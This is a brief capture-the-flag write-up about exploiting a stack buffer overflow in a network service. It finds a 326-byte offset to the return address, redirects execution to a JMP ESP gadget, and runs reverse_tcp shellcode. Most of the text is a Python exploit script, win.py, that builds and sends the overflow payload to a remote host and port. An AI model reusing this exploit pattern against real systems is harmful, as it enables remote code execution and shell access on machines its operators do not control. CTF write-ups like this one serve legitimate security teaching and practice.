We attached to the process with gdb and sent the program a pattern so we could figure out the offset of the return address we were overwriting and got an offset of 326 bytes. Now to figure out what to return to.
Turns out that the stack was executable and there was a convenient 'JMP ESP' sittin' around at address 0x08048F47, so we overwrote the return address with the jmp esp and then popped in some nice reverse_tcp shellcode and won! Our win.py is posted below.
import socket, binascii # For our pattern generator #alph = 'abcefghijklmnopqrstuvwxyz' def recv(s): print s.recv(1024) def endian(s): if len(s) < 8: s = s.zfill(8) return s[6:8]+s[4:6]+s[2:4]+s[0:2] s = socket.socket() s.connect(('128.238.66.218', 4842)) recv(s) win = 'a'*326 win += binascii.unhexlify(endian('08048f47')) win += open('payload').read()+'\n' # A simple pattern generator #for i in alph: # for j in range(0,10): # breaker += i + str(j) print win, len(win) s.sendall(win) recv(s)
-- suntzu_II